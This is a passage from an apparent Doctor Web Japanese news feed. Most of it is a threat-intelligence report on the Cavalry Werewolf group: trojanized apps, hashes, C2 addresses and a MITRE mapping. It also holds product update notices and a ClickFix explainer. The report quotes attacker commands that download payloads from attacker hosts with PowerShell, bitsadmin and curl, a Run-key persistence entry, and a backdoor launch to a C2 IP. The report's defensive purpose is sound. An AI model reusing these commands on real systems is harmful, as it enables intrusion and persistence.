&lt;p&gt;攻撃者によって悪意のあるコードが埋め込まれた、正規プログラムのトロイの木馬化されたバージョンの検出名です。アーカイバWinRarおよび7-Zip、開発ツールVisual Studio Code、テキストエディタAkelPadをはじめとする複数のアプリの悪意のある改変版が発見されています。メッセンジャーMAXに偽装したSumatra PDF Readerもそのうちの1つです。改変版は本来の機能を実行することはできず、起動されると埋め込まれたトロイの木馬コンポーネントを初期化するだけです。&lt;/p&gt;
&lt;p&gt;
    これらの改変版には、サイバー犯罪者の目的に応じてあらゆる種類のマルウェアが仕込まれています。以下はその一部です。
&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=BackDoor.ReverseProxy.1&amp;lng=ja"&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/a&gt; (&lt;a href="https://github.com/Acebond/ReverseSocks5" target="_blank"&gt;ReverseSocks5&lt;/a&gt;)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;BackDoor.Shell.275&lt;/b&gt; (&lt;a href="https://github.com/Adaptix-Framework/AdaptixC2" target="_blank"&gt;AdaptixC2&lt;/a&gt;)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;BackDoor.AdaptixC2.11&lt;/b&gt; (&lt;a href="https://github.com/Adaptix-Framework/AdaptixC2" target="_blank"&gt;AdaptixC2&lt;/a&gt;)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;BackDoor.Havoc.16&lt;/b&gt; (&lt;a href="https://github.com/HavocFramework/Havoc" target="_blank"&gt;Havoc&lt;/a&gt;)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;BackDoor.Meterpreter.227&lt;/b&gt; (CobaltStrike)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Siggen9.56514&lt;/b&gt; (AsyncRAT)&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.Clipper.808&amp;lng=ja"&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Trojan.Packed2.49862の既知のファイル名&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1ハッシュ&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2サーバー&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;ペイロード&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;code.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;rev2.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;8279ad4a8ad20bf7bbca0fc54428d6cdc136b776&lt;/td&gt;
            &lt;td&gt;188[.]127.231[.]136&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;code.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;revv.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;a2326011368d994e99509388cb3dc132d7c2053f&lt;/td&gt;
            &lt;td&gt;192[.]168.11[.]10&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;7zr.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;winload.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;system.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Recorded_TV.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;451cfa10538bc572d9fd3d09758eb945ac1b9437&lt;/td&gt;
            &lt;td&gt;77[.]232.42[.]107&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.Shell.275&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;Command line RAR&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;winlock.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Recorded_TV.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;a5e7e75ee5c0fb82e4dc2f7617c1fe3240f21db2&lt;/td&gt;
            &lt;td&gt;77[.]232.42[.]107&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.AdaptixC2.11&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;winsrv.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;firefox.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;bbe3a5ef79e996d9411c8320b879c5e31369921e&lt;/td&gt;
            &lt;td&gt;94[.]198.52[.]210&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.AdaptixC2.11&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;AkelPad.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;e8ab26b3141fbb410522b2cbabdc7e00a9a55251&lt;/td&gt;
            &lt;td&gt;78[.]128.112[.]209&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.Havoc.16&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;7z.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;dcd374105a5542ef5100f6034c805878153b1205&lt;/td&gt;
            &lt;td&gt;192[.]168.88[.]104&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.Meterpreter.227&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;7z.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;e51a65f50b8bb3abf1b7f2f9217a24acfb3de618&lt;/td&gt;
            &lt;td&gt;192[.]168.1[.]157&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.Siggen9.56514&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;7z.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;chromedriver.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;d2a7bcbf908507af3d7d3b0ae9dbaadd141810a4&lt;/td&gt;
            &lt;td&gt;Telegram-бот&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;7z&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;7z.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;svc_host.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;dzveo09ww.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;c89c1ed4b6dda8a00af54a0ab6dca0630eb45d81&lt;/td&gt;
            &lt;td&gt;Telegram-бот&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;—&lt;/td&gt;
            &lt;td&gt;b05c5fe8b206fb0d168f3a1fc91b0ed548eb46f5&lt;/td&gt;
            &lt;td&gt;Telegram-бот&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;max - для бизнеса.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;b4d0d2bbcfc5a52ed8b05c756cfbfa96838af231 &lt;/td&gt;
            &lt;td&gt;89[.]22.161[.]133&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.Havoc.16&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;h3&gt;侵害されたネットワーク内でCavalry Werewolfが実行する典型的なアクション&lt;/h3&gt;
&lt;p&gt;標的となる組織のコンピューターインフラストラクチャに侵入した攻撃者は、データ収集やシステム内でのさらなる足場固めを目的としたさまざまなアクションを実行します。&lt;/p&gt;
&lt;p&gt;
    感染させたコンピューターに関する情報を収集するために、以下のコマンドを実行します。
&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;whoami&lt;/span&gt; — カレントユーザーに関する情報を取得する&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;dir C:\\users\\&amp;lt;user&amp;gt;\\Downloads&lt;/span&gt; — カレントユーザーの「ダウンロード」フォルダ内にあるファイルのリストを取得する&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;dir C:\\users\\public\\pictures\\&lt;/span&gt; — 共有フォルダの「ピクチャ」フォルダ内にあるファイルのリストを取得する（どのマルウェアがすでにシステム内にダウンロードされているかを特定するため）&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;ipconfig /all&lt;/span&gt; — ネットワーク設定を取得する&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;net user&lt;/span&gt; — システム内のすべてのユーザーのリストを取得する&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;
    プロキシサーバーに関する情報を収集し、ネットワークの機能をチェックするために、以下のコマンドを使用します。
&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;powershell -c '[System.Net.WebRequest]::DefaultWebProxy.GetProxy(\"https://google.com\")'&lt;/span&gt;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;curl -I https://google.com&lt;/span&gt;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;curl -I https://google.com -x &amp;lt;proxy&amp;gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;以下のツールを使用してネットワークを設定します。&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;Windows OSに含まれているコマンドラインツール&lt;span class="string"&gt;netsh&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;続けて、以下の正規ツールを使用して悪意のあるツールをシステムに送り込みます。&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;PowerShell （例: &lt;span class="string"&gt;powershell -Command Invoke-WebRequest -Uri \"hxxps[:]//sss[.]qwadx[.]com/revv3.exe\" -OutFile \"C:\\users\\public\\pictures\\rev.exe&lt;/span&gt;）&lt;/li&gt;
    &lt;li&gt;Bitsadmin （例: &lt;span class="string"&gt;bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/rever.exe C:\\users\\public\\pictures\\rev3.exe&lt;/span&gt;）&lt;/li&gt;
    &lt;li&gt;curl （例: &lt;span class="string"&gt;curl -o C:\\users\\public\\pictures\\rev.exe hxxp[:]//195[.]2.79[.]245/code.exe&lt;/span&gt;）&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;システム内での足場を固めるために以下を実行します。&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;
        Windowsレジストリを変更する（例：&lt;span class="string"&gt;REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Service /t REG_SZ /d C:\users\public\pictures\win.exe /f&lt;/span&gt;）
    &lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;コマンドラインインタープリタcmd.exe を使用して悪意のあるツールを起動します。&lt;br /&gt;例：&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;C:\\users\\public\\libraries\\revv2.exe -connect 78[.]128.112[.]209:10443&lt;/span&gt; — &lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;C:\\users\\public\\pictures\\732.exe&lt;/span&gt;  — &lt;b&gt;BackDoor.Tunnel.41&lt;/b&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;攻撃者はPowerShellを使用して悪意のあるツールを削除できます。&lt;br /&gt;例：&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;powershell -Command Remove-Item C:\\users\\public\\pictures\\732.exe&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;また、&lt;span class="string"&gt;ping&lt;/span&gt;コマンドを使用してC2サーバーが利用可能であるかどうか定期的にチェックすることもできます。&lt;/p&gt;
&lt;h3&gt;ハッカー集団Cavalry Werewolfの特徴&lt;/h3&gt;
&lt;p&gt;ハッカー集団Cavalry Werewolfの大きな特徴として以下が挙げられます。&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;
        オープンソースソフトウェアを好んで使用する（オリジナルをそのまま使用する場合と、それをベースに独自のツールを開発する場合がある）。
    &lt;/li&gt;
    &lt;li&gt;
        メインとなるツールは、感染したシステム上でのリモートコマンド実行を可能にするさまざまなリバースシェルバックドアである。
    &lt;/li&gt;
    &lt;li&gt;
        元々は無害なプログラムに悪意のあるコードを埋め込むことができる。
    &lt;/li&gt;
    &lt;li&gt;
        感染したコンピューターを制御するためにTelegram APIを使用することが多い。
    &lt;/li&gt;
    &lt;li&gt;
        侵害したメールアドレスを使用して政府機関を装ったメールを送信するというフィッシングキャンペーンによって、感染の第一段階を担うマルウェアを送り込む。
    &lt;/li&gt;
    &lt;li&gt;
        その後の感染段階を担うマルウェアを標的デバイスにダウンロードするために、&lt;span class="string"&gt;C:\\users\\public\\pictures&lt;/span&gt;、&lt;span class="string"&gt;C:\\users\\public\\libraries&lt;/span&gt;、&lt;span class="string"&gt;C:\\users\\public\\downloads&lt;/span&gt;ディレクトリを使用する。
    &lt;/li&gt;

&lt;/ul&gt;
&lt;p&gt;
    このたび特定されたCavalry Werewolfのツールに関する詳細な技術的情報については、本調査レポートのPDFバージョンまたはDoctor Webウイルスライブラリを参照してください。
&lt;/p&gt;
&lt;p&gt;
    &lt;a href="https://vms.drweb.co.jp/search/?q=BackDoor.ReverseProxy.1&amp;lng=ja"&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/a&gt; の詳細 ※英語&lt;br /&gt;
    &lt;a href="https://vms.drweb.co.jp/search/?q=BackDoor.ReverseShell.10&amp;lng=ja"&gt;&lt;b&gt;BackDoor.ReverseShell.10&lt;/b&gt;&lt;/a&gt; の詳細 ※英語&lt;br /&gt;
    &lt;a href="https://vms.drweb.co.jp/search/?q=BackDoor.RShell.169&amp;lng=ja"&gt;&lt;b&gt;BackDoor.RShell.169&lt;/b&gt;&lt;/a&gt; の詳細 ※英語&lt;br /&gt;
    &lt;a href="https://vms.drweb.co.jp/search/?q=BackDoor.ShellNET.1&amp;lng=ja"&gt;&lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt;&lt;/a&gt; の詳細 ※英語&lt;br /&gt;
    &lt;a href="https://vms.drweb.co.jp/search/?q=BackDoor.ShellNET.2&amp;lng=ja"&gt;&lt;b&gt;BackDoor.ShellNET.2&lt;/b&gt;&lt;/a&gt; の詳細 ※英語&lt;br /&gt;
    &lt;a href="https://vms.drweb.co.jp/search/?q=BackDoor.Siggen2.5463&amp;lng=ja"&gt;&lt;b&gt;BackDoor.Siggen2.5463&lt;/b&gt;&lt;/a&gt; の詳細 ※英語&lt;br /&gt;
    &lt;a href="https://vms.drweb.co.jp/search/?q=BackDoor.Tunnel.41&amp;lng=ja"&gt;&lt;b&gt;BackDoor.Tunnel.41&lt;/b&gt;&lt;/a&gt; の詳細 ※英語&lt;br /&gt;
    &lt;a href="https://vms.drweb.co.jp/search/?q=BAT.DownLoader.1138&amp;lng=ja"&gt;&lt;b&gt;BAT.DownLoader.1138&lt;/b&gt;&lt;/a&gt; の詳細 ※英語&lt;br /&gt;
    &lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.Siggen31.54011&amp;lng=ja"&gt;&lt;b&gt;Trojan.Siggen31.54011&lt;/b&gt;&lt;/a&gt; の詳細 ※英語&lt;br /&gt;
    &lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.Clipper.808&amp;lng=ja"&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/a&gt; の詳細 ※英語&lt;br /&gt;
    &lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.FileSpyNET.5&amp;lng=ja"&gt;&lt;b&gt;Trojan.FileSpyNET.5&lt;/b&gt;&lt;/a&gt; の詳細 ※英語&lt;br /&gt;
    &lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.Inject5.57968&amp;lng=ja"&gt;&lt;b&gt;Trojan.Inject5.57968&lt;/b&gt;&lt;/a&gt; の詳細 ※英語&lt;br /&gt;
    &lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.Packed2.49708&amp;lng=ja"&gt;&lt;b&gt;Trojan.Packed2.49708&lt;/b&gt;&lt;/a&gt; の詳細 ※英語&lt;br /&gt;
    &lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.Packed2.49862&amp;lng=ja"&gt;&lt;b&gt;Trojan.Packed2.49862&lt;/b&gt;&lt;/a&gt; の詳細 ※英語
&lt;/p&gt;
&lt;h3&gt;MITREマトリックス&lt;/h3&gt;

&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Stage（段階）&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;Technique（技術・手法）&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;Initial access（初期アクセス）&lt;/td&gt;
            &lt;td&gt;T1566.001：Spearphishing attachment（スピアフィッシング添付ファイル）&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Execution（実行）&lt;/td&gt;
            &lt;td&gt;
                T1204：User execution（ユーザーによる実行）
                &lt;br /&gt;&lt;br /&gt;
                T1059.001：PowerShell
                &lt;br /&gt;&lt;br /&gt;
                T1059.003：Windows Command Shell
            &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Persistence（永続化）&lt;/td&gt;
            &lt;td&gt;
                T1547.001：Registry Run Keys / Startup Folder （レジストリRunキー／スタートアップフォルダ）
                &lt;br /&gt;&lt;br /&gt;
                T1197：BITS Jobs （BITSジョブ）
            &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Privilege Escalation（権限昇格）&lt;/td&gt;
            &lt;td&gt;T1548.002：Bypass User Account Control（ユーザーアカウント制御のバイパス）&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Defense Evasion（防御回避）&lt;/td&gt;
            &lt;td&gt;T1197：BITS Jobs（BITSジョブ）&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Command and Control（コマンド・アンド・コントロール）&lt;/td&gt;
            &lt;td&gt;
                T1090.002：External Proxy（外部プロキシ）
                &lt;br /&gt;&lt;br /&gt;
                T1102.002：Bidirectional Communication（双方向通信）
            &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Exfiltration（情報窃取）&lt;/td&gt;
            &lt;td&gt;
                T1041：Exfiltration Over C2 Channel（C2チャネルを介した盗み出し）
                &lt;br /&gt;&lt;br /&gt;
                T1567：Exfiltration Over Web Service（Webサービスを介した盗み出し）
            &lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Cavalry%20Werewolf/README.adoc" target="_blank"&gt;Indicators of compromise(侵害の痕跡)&lt;/a&gt;※英語</description></item><item><guid>https://news.drweb.co.jp/show/?i=15079&amp;lng=ja</guid><title>モバイルデバイス向けのDr.Webアップデート、インテリジェント保護システムを新たに実装</title><link>https://news.drweb.co.jp/show/?i=15079&amp;lng=ja&amp;c=5</link><pubDate>Fri, 07 Nov 2025 09:00:00 GMT</pubDate><description>&lt;newslead&gt;スマートフォン、タブレット、他のAndroid対応デバイス向けのアンチウイルス製品がリリースされました。主な改良点は、保護の自動化と安定性の向上です。&lt;/newslead&gt;&lt;h3&gt;アップデートの特徴&lt;/h3&gt;&lt;p&gt;新機能「自動脅威処理」の実装により、Dr.Webソリューションは、遅延なく、ユーザーの操作なしで悪意あるオブジェクトの駆除や不審なリンクのブロック、危険なアプリの隔離を自動で行えるようになりました。&lt;/p&gt;&lt;h3&gt;利用のメリット&lt;/h3&gt;&lt;p&gt;個人ユーザーは、もはや脅威通知を逐一確認する必要がありません。&lt;br&gt;新機能により、アンチウイルス製品が検出から対応までを自動で行うため、ユーザー操作を介さずに独立して動作します。Doctor Webの専門家が開発したインテリジェントシステムは、マルウェアの種類に応じて設定されたパラメータに基づき、脅威をリアルタイムで自動駆除します。&lt;br&gt;特に法人ユーザーにとっては、悪意あるオブジェクトの駆除や不審なリンクのブロックなどの対応を、システム管理者の介入なしで即時に実行できる点が大きな利点です。&lt;br&gt;これらの機能はControl Center経由でも管理可能です。&lt;/p&gt;&lt;h3&gt;運用の利便性向上&lt;/h3&gt;&lt;p&gt;今回のアップデートでは、Androidデバイス上で検出された脅威に対し、ScannerおよびSpIDer Guardコンポーネントの対応を一元管理できる機能が追加されました。&lt;br&gt;システム管理者は、脅威の種類に応じて、Dr.Webエージェントの動作（通知・駆除・無視など）を柔軟に設定できます。&lt;/p&gt;&lt;p&gt;&lt;br&gt;&amp;nbsp;&lt;/p&gt;&lt;div class="alert"&gt;&lt;p&gt;&lt;strong&gt;【重要なお知らせ! 】&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;&lt;/div&gt;&lt;p&gt;最新バージョンのリリースに伴い、Android OS バージョン4.4のサポートを終了いたします。アップデートの際はご注意ください。&lt;br&gt;Doctor Web公式ウェブサイトからダウンロードされた Dr.Web Security Space for mobile devices をご利用の場合、アップデートのためにアプリケーションの完全な再インストールが必要です。最新バージョンのエージェントをダウンロードし、再インストールを行ってください。&lt;br&gt;一方、Google Playからダウンロードされた Dr.Web Security Space for mobile devices、Dr.Webサブスクリプションサービス、または Dr.Web Mobile Security Suite をご利用の場合、今回のアップデートは通常どおり実行されます。&lt;/p&gt;</description></item><item><guid>https://news.drweb.co.jp/show/?i=15080&amp;lng=ja</guid><title>Dr.Web Enterprise Security Suite / Dr.Web Industrialの集中管理サーバーのアップデート</title><link>https://news.drweb.co.jp/show/?i=15080&amp;lng=ja&amp;c=5</link><pubDate>Fri, 07 Nov 2025 09:00:00 GMT</pubDate><description>&lt;newslead&gt;― 安定性の向上とAndroid端末管理機能の強化 ―&lt;br&gt;Dr.Web Enterprise Security SuiteおよびDr.Web Industrialサーバーの最新アップデートがリリースされました。今回のバージョンでは、安定性の向上に加え、Android対応デバイスの脅威対処を強化する新しい集中管理ツールが追加されています。システムを安定してご利用いただくため、サーバーを最新バージョンへ更新することを推奨します。&lt;/newslead&gt;&lt;p&gt;機能強化の概要&lt;br&gt;最新のDr.Web Enterprise Security Suiteサーバーでは、保護システムの管理機能がさらに強化されました。Android端末の保護機能も改善され、Control Centerからアンチウイルス保護をより包括的に管理できるようになっています。&lt;/p&gt;&lt;p&gt;新しい集中管理機能&lt;br&gt;アップデートにより、Androidデバイス上で検出された脅威への対応を、ScannerおよびSpIDer Guardコンポーネントを通じて一元管理できるようになりました。&lt;br&gt;システム管理者は、脅威の種類に応じてDr.Webエージェントの動作（通知・駆除・無視など）を柔軟に設定できます。&lt;/p&gt;&lt;p&gt;設定方法の変更&lt;br&gt;これまで「アドウェアをチェック」および「潜在的に危険なプログラムをチェック」として表示されていた設定項目が、新しい選択方式に置き換えられました。&lt;br&gt;•&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;チェックが無効な場合：該当プログラムへのデフォルトアクションは「無視」となります。&lt;br&gt;•&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;チェックが有効な場合：「レポート」アクションが適用されます。&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;div class="alert"&gt;&lt;p&gt;&lt;strong&gt;【重要事項】&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;&lt;/div&gt;&lt;p&gt;新バージョンの全機能を有効にし、保護コンポーネントを正常に動作させるためには、集中管理サーバーを最新バージョンへ更新する必要があります。アップデートは管理コンソールのWebインターフェイスから実行できます。&lt;br&gt;アップデート設定や実施に関するご不明点がありましたら、テクニカルサポートまでお問い合わせください。&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.co.jp/show/?i=15074&amp;lng=ja</guid><title>急増する「ClickFix攻撃」とは</title><link>https://news.drweb.co.jp/show/?i=15074&amp;lng=ja&amp;c=5</link><pubDate>Wed, 29 Oct 2025 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;strong&gt;2025年10月29日&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;ClickFix攻撃によるセキュリティインシデントが急激に増加し、世界中で多くのユーザーを不安に陥れています。攻撃者はソーシャルエンジニアリング手法を用いてユーザーを操り、デバイス上で悪意のあるコードを実行させます。&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;攻撃は、ユーザーが侵害されたサイトや偽サイトにアクセスし、ブラウザのエラーによりWebページを正しく表示できない、あるいは更新が必要であるなどと通知する警告メッセージを目にするところから始まります。&lt;/p&gt;&lt;p&gt;通常、こうしたメッセージには「修正」、「チェック」、「更新」などのボタンが含まれており、ボタンが画面に表示されるやいなや悪意のあるコードが自動的にクリップボードにコピーされます。ユーザーがボタンをクリックする必要すらありません。続けて、ユーザーはこのコードをコマンドプロンプトまたは「実行」ダイアログボックスに貼り付けるよう指示されます。ユーザーが指示に従うと直ちに悪意のあるプログラムがインストールされて起動されます。この操作はユーザー自らが実行するため、多くの場合アンチウイルスによって防ぐことができません。&lt;/p&gt;&lt;h3&gt;以下にClickFix攻撃の流れを簡潔に再現します。&lt;/h3&gt;&lt;p&gt;ユーザーがコンテンツを読み込んで表示すると、ブラウザに突然警告メッセージが表示されます。メッセージには、最近のブラウザ更新による問題が原因でコンテンツを正しく表示することができないと記載されています。&lt;/p&gt;&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;&lt;a class="preview" href="https://st.drweb.co.jp/static/new-www/news/2025/october/clickfix/01_ClickFix.png"&gt;&lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/clickfix/01_ClickFix.1.png" alt="#drweb"&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;そして、問題を解決するために次の操作を実行するようユーザーに指示しています。&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;「Fix it!（修正）」ボタンをクリックする&lt;/li&gt;&lt;li&gt;Windowsのスタートボタンを右クリックする&lt;/li&gt;&lt;li&gt;プログラム一覧でWindows PowerShellを見つけ、管理者権限で開く&lt;/li&gt;&lt;li&gt;右クリックでクリップボードの内容をターミナルウィンドウに貼り付け、コマンドを実行する&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;ユーザーがボタンをクリックすると、悪意のあるスクリプトがクリップボードにコピーされてターミナルウィンドウで実行されます。&lt;/p&gt;&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;&lt;a class="preview" href="https://st.drweb.co.jp/static/new-www/news/2025/october/clickfix/02_ClickFix.png"&gt;&lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/clickfix/02_ClickFix.1.png" alt="#drweb"&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;このスクリプトは、攻撃者が侵害したシステムを遠隔操作するために使用するC2インフラストラクチャへのリモート接続を確立します。&lt;/p&gt;&lt;p&gt;この事例では、リモートC2ホストとの接続が確立され、ペイロードがユーザーのデバイス上にダウンロードされます。その後、hostsファイルを改変するよう設計された悪意のある実行ファイルが起動され、実行中のスクリプトが終了します。&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Dr.Webには予防的保護テクノロジーが搭載されており、スクリプトが実行ファイルの起動を試みると同時に脅威を検出することが可能です。&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;ClickFix攻撃で多く使用されるまた別の手口が偽のCAPTCHAです。一見本物のように見えるCAPTCHA認証画面が表示され、その裏で密かに悪意のあるコードがクリップボードにコピーされます。自分は人間であるということを証明しているだけだと信じ込んでいるユーザーが気づかぬうちに悪意のあるコンテンツを操作してしまうため、攻撃の成功率が高まります。&lt;/p&gt;&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;&lt;a class="preview" 